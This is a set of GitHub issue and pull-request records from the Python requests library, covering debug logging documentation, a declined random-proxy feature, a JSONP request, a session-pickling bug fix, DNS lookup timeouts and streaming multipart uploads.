[ "Using the search functionality with the phrase \"logging\" helped me find the section of the docs that details how to enable logging. I for one would rather not have the same content copied and pasted in the documentation because that provides two places where it would need to be updated and they will easily fall out of sync. My question then is, where do you think it would make most sense to move this to? \n", "Agreed on not duplicating instructions. I'm thinking a section in the \"quick start\" at the bottom, perhaps the title \"Debugging\" followed by a collection of all the tricks that can be used to enable the various levels of debugging. For other debugging recipes outside of basic logging usage, we could link to another page with the various recipes. Thoughts?\n", "I really don't think this belongs in the quickstart section frankly. It isn't something most people will need as soon as they start using requests. It's more of an advanced usage piece of information, but even then our Advanced section is already quite large and overloaded. I'm not entirely convinced this shouldn't be it's own section though. I'd love to see more of the recipes you think belong there before we do that though and I'd would **really** like @Lukasa's input when they have a minute or two to spare.\n", "Yeah ideally it just needs to be somewhere that can be easily found, because currently it's in an obscure place which is difficult to find. Perhaps \"troubleshooting\" or something like that... I'd argue that debugging requests/urllib3 is quite a tedious task, for example the logging approach dumps all the info but in a non human readable format... Recipes would be for showing how to dump info in a pretty format, for example request/response headers split with their new lines intact etc.\n", "I think the bigger problem here is that the SO answer isn't correct. Requests has _no_ way to dump the request exactly as it was sent on the wire. There are a number of layers in between the top and us, any of which are free to change the code as they please. `httplib` is the worst offender here, particularly with responses, which it parses before dumping them (so if they don't parse properly they won't get dumped properly either).\n\nI think a 'how to debug HTTP' article is a good idea, but it's not entirely clear to me that it belongs in our documentation. If we had it, however, I'd be recommending things like Wireshark/tcpdump, rather than logging. Don't trust what the application tells you it's sending, ask the OS instead.\n", "@Lukasa All good points. From the perspective of a new user who isn't aware of the architecture of requests, they just want a simple mechanism that will allow easy debugging without having to use wireshark filters, passive burp proxy etc. For example, when using `curl` you can use the `-v` option to dump all request data, something like that for requests would be more than sufficient. \n\nI'm wondering if it would be more appropriate to raise a feature request in `urllib3` for a simple session method, such as `verbose(True/False)` which then implements the necessary recipe to dump traffic data in a similar format as `curl -v`. If accepted, then we could implement a method on `requests.Session` that called the urllib3 verbose method.\n\nDoes that sound like a good way forward?\n", "No it doesn't sound like a good way forward. urllib3 doesn't need that parameter and we won't be expanding the Session API unnecessarily. I'm also rather perturbed that people find this so hard to find. If you find requests' docs and you search for \"logging\" you'll find that documentation quickly. It's not in the higher traffic parts of the docs, granted, but it's also not something I see a lot of people using very much.\n", "Right, I'm going to disagree with you there, and I'm also somewhat \"perturbed\" that you feel this would be unnecessary expansion. If you have already acknowledged that people are finding it difficult, then perhaps that would suggest something. Furthermore, the logging shown from `httplib` is also not very human readable and isn't easily useful (imho).\n\nI'm going to raise this in `urllib3` anyway, and see if the feedback is any different. \n\nThanks for the replies all!\n", "Cory's a maintainer there and I'm opposed to adding this to either our \nSesssion API or urllib3's PoolManager API, so you can create the issue but it \nisn't likely to progress very far.\n", "I'm fully aware of that, thanks.\n", "@sigmavirus24 Normally I don't bother commenting on rudeness, but I felt compelled to on this occasion because of my prior background with requests/urllib3. I really feel like your response was overly aggressive and borderline rude. I've never had this issue with any of the other core maintainers in the past, and I spent time specifically replying because they have always been polite and reasonable, even when rejecting my code or requests. This interaction has left me feeling like I no longer want to bother contributing towards either of those projects, your reaction/approach was completely unnecessary and similar in tone with the Django core developers poor bed side manner.\n\nSometimes things get rejected, and that's fine, but there's no need to be rude about it.\n", "Closing for now. For anyone in future, there has also been some discussion on this in https://github.com/shazow/urllib3/issues/107\n", "@foxx I'm sorry you felt that way. It's never our intention to create a hostile atmosphere, and I apologise unreservedly if that's what we did.\n\nThis is another of my 'wish list' features for a rewrite of `httplib`. If I ever find the time to do it, this will be a key tentpole of that rewrite.\n", "@Lukasa Thank you for the follow up, it's appreciated. Based on comments in those other issues and a quick inspection of the source, additional debugging support would _probably_ have to rely on monkey patching. Given that's not a great approach, I'd agree that a rewrite of `httplib` is sounding like the cleaner option. \n\nOut of curiosity, were you planning on keeping the `httplib` rewrite backwards compatible, or would it be `httplib2`?\n", "@foxx I wasn't trying to be rude just honest. If there's anything that annoys me most it's when people aren't fully honest in a way that would help me prevent wasting my time. If I'm mistaken about which comment offended you, let me know. It's no excuse but I'm typically in a rush and replying from my phone. I don't often have the luxury of re-reading things to make sure they won't come across as rude. I do hope you continue to contribute because your input is valuable. \n", "@sigmavirus24 I appreciate the follow up, thank you, and no hard feelings :)\n", "@foxx It would not be backwards compatible, but neither would it be `httplib2` (that already exists!). `httplib`'s API is _bad_, and it limits what can be done by libraries that build on top of it. I have ideas for where to go next, but again, no time. =(\n" ]
https://api.github.com/repos/psf/requests/issues/2351
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2351/labels{/name}
https://api.github.com/repos/psf/requests/issues/2351/comments
https://api.github.com/repos/psf/requests/issues/2351/events
https://github.com/psf/requests/pull/2351
49,689,412
MDExOlB1bGxSZXF1ZXN0MjQ4MzYwMjc=
2,351
Added ability to use list of proxies for each scheme. Proxies are randomly selected.
{ "avatar_url": "https://avatars.githubusercontent.com/u/955888?v=4", "events_url": "https://api.github.com/users/lexapi/events{/privacy}", "followers_url": "https://api.github.com/users/lexapi/followers", "following_url": "https://api.github.com/users/lexapi/following{/other_user}", "gists_url": "https://api.github.com/users/lexapi/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/lexapi", "id": 955888, "login": "lexapi", "node_id": "MDQ6VXNlcjk1NTg4OA==", "organizations_url": "https://api.github.com/users/lexapi/orgs", "received_events_url": "https://api.github.com/users/lexapi/received_events", "repos_url": "https://api.github.com/users/lexapi/repos", "site_admin": false, "starred_url": "https://api.github.com/users/lexapi/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/lexapi/subscriptions", "type": "User", "url": "https://api.github.com/users/lexapi", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-11-21T12:15:25Z
2021-09-08T09:01:13Z
2014-11-25T03:06:12Z
NONE
resolved
Basic Usage: ``` python import requests r = requests.Session() p = {'http':['proxy1.com:81', 'proxy2:82', 'proxy2:82'], 'https': 'proxy4.com'} r.proxies = p print r.get('http://ya.ru') print r.get('http://google.com') print requests.get('http://ya.ru', proxies=p) print r.get('https://www.google.ru') print requests.get('https://www.google.ru') ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2351/reactions" }
https://api.github.com/repos/psf/requests/issues/2351/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2351.diff", "html_url": "https://github.com/psf/requests/pull/2351", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2351.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2351" }
true
[ "I'm not sure I understand how this is supposed to work.\n", "Currently, we are can use only one proxy for scheme, but some sites have limits on the number of requests from 1 IP (per second, minutes, etc)\nIf we make a spider for the site - we will have big problems (\nThis function allows you to immediately set large list of proxies for the scheme(protocol) and use random for each request (without code changes).\nExample without it this changes:\n\n``` python\nimport requests\nimport random\nr = requests.Session()\np = {'http':random.choice(['proxy1.com:81', 'proxy2:82', 'proxy2:82']), 'https': 'proxy4.com'}\nr.proxies = p\nprint r.get('http://ya.ru')\n# we are must change proxy for next request\np['http'] = random.choice(['proxy1.com:81', 'proxy2:82', 'proxy2:82'])\nr.proxies = p\nprint r.get('http://ya.ru')\n```\n", "So no one has ever requested this before and I haven't found anyone else searching for this on stackoverflow. Given that this is such a niché feature, we won't be accepting this. The good thing is that you already have the code to make this work (for the most part). What you want is a class that's either subclasses `dict` or `collections.MutableMapping`. It will contain allow us to do `.get('http://')` for example and the class will give us one value that you choose to give us.\n", "Thanks for the answer. I just proposed a variant)\n" ]
https://api.github.com/repos/psf/requests/issues/2350
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2350/labels{/name}
https://api.github.com/repos/psf/requests/issues/2350/comments
https://api.github.com/repos/psf/requests/issues/2350/events
https://github.com/psf/requests/issues/2350
49,639,244
MDU6SXNzdWU0OTYzOTI0NA==
2,350
JSONP support
{ "avatar_url": "https://avatars.githubusercontent.com/u/9846444?v=4", "events_url": "https://api.github.com/users/gtlhc/events{/privacy}", "followers_url": "https://api.github.com/users/gtlhc/followers", "following_url": "https://api.github.com/users/gtlhc/following{/other_user}", "gists_url": "https://api.github.com/users/gtlhc/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/gtlhc", "id": 9846444, "login": "gtlhc", "node_id": "MDQ6VXNlcjk4NDY0NDQ=", "organizations_url": "https://api.github.com/users/gtlhc/orgs", "received_events_url": "https://api.github.com/users/gtlhc/received_events", "repos_url": "https://api.github.com/users/gtlhc/repos", "site_admin": false, "starred_url": "https://api.github.com/users/gtlhc/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/gtlhc/subscriptions", "type": "User", "url": "https://api.github.com/users/gtlhc", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-21T00:58:18Z
2021-09-08T23:06:56Z
2014-11-21T01:17:30Z
NONE
resolved
Add JSONP support for the Response: code: jp=r.content qi=jp.index('(') callback=jp[:qi] data=jp[qi+1:-1] return callback,data usage: r.jsonp.callback #string r.jsonp.data #json
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2350/reactions" }
https://api.github.com/repos/psf/requests/issues/2350/timeline
null
completed
null
null
false
[ "We're not accepting new features any longer unless there's an extremely compelling usecase. Thanks for the suggestion though! \n" ]
https://api.github.com/repos/psf/requests/issues/2349
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2349/labels{/name}
https://api.github.com/repos/psf/requests/issues/2349/comments
https://api.github.com/repos/psf/requests/issues/2349/events
https://github.com/psf/requests/pull/2349
49,179,140
MDExOlB1bGxSZXF1ZXN0MjQ1ODc5MDE=
2,349
Properly serialize RecentlyUsedContainers for cache
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "009800", "default": false, "description": null, "id": 44501218, "name": "Ready To Merge", "node_id": "MDU6TGFiZWw0NDUwMTIxOA==", "url": "https://api.github.com/repos/psf/requests/labels/Ready%20To%20Merge" }, { "color": "207de5", "default": false, "description": null, "id": 60620163, "name": "Minion Seal of Approval", "node_id": "MDU6TGFiZWw2MDYyMDE2Mw==", "url": "https://api.github.com/repos/psf/requests/labels/Minion%20Seal%20of%20Approval" } ]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" } ]
null
3
2014-11-18T04:18:55Z
2021-09-08T09:01:12Z
2014-11-30T19:12:43Z
CONTRIBUTOR
resolved
RecentlyUsedContainers are threadsafe so they require a lock and as such cannot be serialized with pickle directly. To handle it, we need to convert it to a dictionary first and then back when deserializing. Fixes #2345
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2349/reactions" }
https://api.github.com/repos/psf/requests/issues/2349/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2349.diff", "html_url": "https://github.com/psf/requests/pull/2349", "merged_at": "2014-11-30T19:12:43Z", "patch_url": "https://github.com/psf/requests/pull/2349.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2349" }
true
[ "looks good! any way to add a test exposing this issue?\n", "> any way to add a test exposing this issue?\n\nBesides the test that failed in the first place? Jenkins isn't running for a reason only @kennethreitz can determine. Had @Lukasa or I been running the tests locally before approving PRs, it probably wouldn't have reached this point.\n", "+1 LGTM.\n" ]
https://api.github.com/repos/psf/requests/issues/2348
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2348/labels{/name}
https://api.github.com/repos/psf/requests/issues/2348/comments
https://api.github.com/repos/psf/requests/issues/2348/events
https://github.com/psf/requests/pull/2348
49,072,887
MDExOlB1bGxSZXF1ZXN0MjQ1MjY5NDc=
2,348
Docs: Add more section labels for referencing
{ "avatar_url": "https://avatars.githubusercontent.com/u/434495?v=4", "events_url": "https://api.github.com/users/danmichaelo/events{/privacy}", "followers_url": "https://api.github.com/users/danmichaelo/followers", "following_url": "https://api.github.com/users/danmichaelo/following{/other_user}", "gists_url": "https://api.github.com/users/danmichaelo/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/danmichaelo", "id": 434495, "login": "danmichaelo", "node_id": "MDQ6VXNlcjQzNDQ5NQ==", "organizations_url": "https://api.github.com/users/danmichaelo/orgs", "received_events_url": "https://api.github.com/users/danmichaelo/received_events", "repos_url": "https://api.github.com/users/danmichaelo/repos", "site_admin": false, "starred_url": "https://api.github.com/users/danmichaelo/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/danmichaelo/subscriptions", "type": "User", "url": "https://api.github.com/users/danmichaelo", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-17T10:42:33Z
2021-09-08T09:01:12Z
2014-11-30T19:12:04Z
CONTRIBUTOR
resolved
so sections can be linked from other projects using Intersphinx
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2348/reactions" }
https://api.github.com/repos/psf/requests/issues/2348/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2348.diff", "html_url": "https://github.com/psf/requests/pull/2348", "merged_at": "2014-11-30T19:12:04Z", "patch_url": "https://github.com/psf/requests/pull/2348.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2348" }
true
[ "thanks!\n" ]
https://api.github.com/repos/psf/requests/issues/2347
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2347/labels{/name}
https://api.github.com/repos/psf/requests/issues/2347/comments
https://api.github.com/repos/psf/requests/issues/2347/events
https://github.com/psf/requests/issues/2347
49,035,544
MDU6SXNzdWU0OTAzNTU0NA==
2,347
feature request: add a timeout to DNS lookups
{ "avatar_url": "https://avatars.githubusercontent.com/u/234019?v=4", "events_url": "https://api.github.com/users/kevinburke/events{/privacy}", "followers_url": "https://api.github.com/users/kevinburke/followers", "following_url": "https://api.github.com/users/kevinburke/following{/other_user}", "gists_url": "https://api.github.com/users/kevinburke/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinburke", "id": 234019, "login": "kevinburke", "node_id": "MDQ6VXNlcjIzNDAxOQ==", "organizations_url": "https://api.github.com/users/kevinburke/orgs", "received_events_url": "https://api.github.com/users/kevinburke/received_events", "repos_url": "https://api.github.com/users/kevinburke/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinburke/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinburke/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinburke", "user_view_type": "public" }
[]
closed
true
null
[]
null
5
2014-11-17T04:24:41Z
2021-09-08T23:06:58Z
2014-11-17T05:45:05Z
CONTRIBUTOR
resolved
I don't think it's possible. But it would be nice. Currently if: 1. you set your DNS resolvers to something that's not listening on port 53, eg 123.123.123.123 2. you try to make a request with a timeout The request will use the system timeout, usually upwards of 2 minutes. It would be nice to be able to attach a timeout to DNS lookups. Go attaches one for example by resolving DNS in a goroutine with a thread timeout.
{ "avatar_url": "https://avatars.githubusercontent.com/u/234019?v=4", "events_url": "https://api.github.com/users/kevinburke/events{/privacy}", "followers_url": "https://api.github.com/users/kevinburke/followers", "following_url": "https://api.github.com/users/kevinburke/following{/other_user}", "gists_url": "https://api.github.com/users/kevinburke/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinburke", "id": 234019, "login": "kevinburke", "node_id": "MDQ6VXNlcjIzNDAxOQ==", "organizations_url": "https://api.github.com/users/kevinburke/orgs", "received_events_url": "https://api.github.com/users/kevinburke/received_events", "repos_url": "https://api.github.com/users/kevinburke/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinburke/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinburke/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinburke", "user_view_type": "public" }
{ "+1": 1, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 1, "url": "https://api.github.com/repos/psf/requests/issues/2347/reactions" }
https://api.github.com/repos/psf/requests/issues/2347/timeline
null
completed
null
null
false
[ "in theory you could run the socket.connect() in a thread and time it out\n", "Given that requests doesn't handle sockets itself, I think this is a feature you should be requesting in urllib3. Before you open an issue there, I wonder if @shazow would care to express their opinion here first.\n", "I would love to have the ability to include a DNS timeout, but spawning a separate thread is not a viable option (for urllib3, at least).\n", "So something that should probably be pushed upstream to bugs.python.org as a feature request and will have to be a 3.5+ only feature. \n", "okay i submitted http://bugs.python.org/issue22889\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Sun, Nov 16, 2014 at 9:19 PM, Ian Cordasco [email protected]\nwrote:\n\n> So something that should probably be pushed upstream to bugs.python.org\n> as a feature request and will have to be a 3.5+ only feature.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2347#issuecomment-63261047\n> .\n" ]
https://api.github.com/repos/psf/requests/issues/2346
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2346/labels{/name}
https://api.github.com/repos/psf/requests/issues/2346/comments
https://api.github.com/repos/psf/requests/issues/2346/events
https://github.com/psf/requests/issues/2346
49,033,987
MDU6SXNzdWU0OTAzMzk4Nw==
2,346
Uploading Binary Files Without Reading Into RAM
{ "avatar_url": "https://avatars.githubusercontent.com/u/7476821?v=4", "events_url": "https://api.github.com/users/tuntapovski/events{/privacy}", "followers_url": "https://api.github.com/users/tuntapovski/followers", "following_url": "https://api.github.com/users/tuntapovski/following{/other_user}", "gists_url": "https://api.github.com/users/tuntapovski/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/tuntapovski", "id": 7476821, "login": "tuntapovski", "node_id": "MDQ6VXNlcjc0NzY4MjE=", "organizations_url": "https://api.github.com/users/tuntapovski/orgs", "received_events_url": "https://api.github.com/users/tuntapovski/received_events", "repos_url": "https://api.github.com/users/tuntapovski/repos", "site_admin": false, "starred_url": "https://api.github.com/users/tuntapovski/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/tuntapovski/subscriptions", "type": "User", "url": "https://api.github.com/users/tuntapovski", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-11-17T04:08:38Z
2021-09-08T23:06:58Z
2014-11-17T04:42:53Z
NONE
resolved
hi there. i try to upload a file via this: http://docs.python-requests.org/en/latest/user/advanced/#post-multiple-multipart-encoded-files but it does seem to read it into ram first. because i get memory errors on my low ram vps. it would be good if it would have worked like this: http://docs.python-requests.org/en/latest/user/advanced/#streaming-uploads my example code: import requests with open('example.rar', 'rb') as f: r = requests.post('https://anonfiles.com/api/v1/upload', files={'file' : f}) print r.text
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2346/reactions" }
https://api.github.com/repos/psf/requests/issues/2346/timeline
null
completed
null
null
false
[ "If you look at http://docs.python-requests.org/en/latest/user/quickstart/#post-a-multipart-encoded-file you'll see that we mention this limitation and recommend [requests-toolbelt](/sigmavirus24/requests-toolbelt). There's documentation on that project and it should be simple to use. Any problems encountered while using it should be filed against that project.\n", "oh sorry i'm blind. thnx for the support\nhave a nice day\n", "@daft117 Happy to help. \n" ]
https://api.github.com/repos/psf/requests/issues/2345
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2345/labels{/name}
https://api.github.com/repos/psf/requests/issues/2345/comments
https://api.github.com/repos/psf/requests/issues/2345/events
https://github.com/psf/requests/issues/2345
48,994,009
MDU6SXNzdWU0ODk5NDAwOQ==
2,345
Using RecentlyUsedContainer for session cache breaks pickling
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "e10c02", "default": false, "description": null, "id": 117744, "name": "Bug", "node_id": "MDU6TGFiZWwxMTc3NDQ=", "url": "https://api.github.com/repos/psf/requests/labels/Bug" } ]
closed
true
null
[]
null
5
2014-11-16T15:52:15Z
2021-09-08T23:06:55Z
2014-11-30T19:12:43Z
CONTRIBUTOR
resolved
The changes in 387c8f8 have broken the ability to pickle a Session object. Possible solutions: - Re-implement `RecentlyUsedContainer` to not use threading locks - Do not attempt to pickle the session redirect cache (personally, I prefer this one) Reasons this wasn't caught earlier: - Jenkins has magically stopped working - No one has been running the suite locally before merging/approving changes
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2345/reactions" }
https://api.github.com/repos/psf/requests/issues/2345/timeline
null
completed
null
null
false
